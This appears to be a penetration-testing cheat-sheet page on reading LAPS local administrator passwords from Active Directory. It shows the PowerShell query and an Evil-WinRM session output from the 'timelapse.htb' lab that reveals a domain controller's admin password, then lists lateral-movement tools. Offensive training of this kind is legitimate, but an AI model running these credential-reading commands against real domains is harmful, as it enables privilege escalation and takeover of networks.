# LAPS Password Read

We execute the following command in Powershell if we want to read LAPS Passwords. 

```
Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd,ms-Mcs-AdmPwdExpirationTime
```

![](https://3418038199-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyTPWZkKJbJfX8uHiRzmn%2Fuploads%2Fn6Y9Iy5VnCh6kXNWkeim%2F2022-07-27_23-54.png?alt=media\&token=3b0bdcc8-7859-4b7b-953b-2d38cf2952cb)

Notice in the output how the password is contained within ms-Mcs-AdmPwd.

```
Evil-WinRM* PS C:\Users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime}


PSComputerName              : localhost
RunspaceId                  : ae9923c4-551b-480e-aebd-e19931fe811a
DistinguishedName           : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName                 : dc01.timelapse.htb
Enabled                     : True
ms-Mcs-AdmPwd               : 8p4Uc,AC5lJ9E]P9X7#3$10@
ms-Mcs-AdmPwdExpirationTime : 132951514281823553
Name                        : DC01
ObjectClass                 : computer
ObjectGUID                  : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName              : DC01$
SID                         : S-1-5-21-671920749-559770252-3318990721-1000
UserPrincipalName           :
```

Now we try the whole deal:

* [ ] psexec
* [ ] evilwinrm
* [ ] psremoting
* [ ] runas
* [ ] cme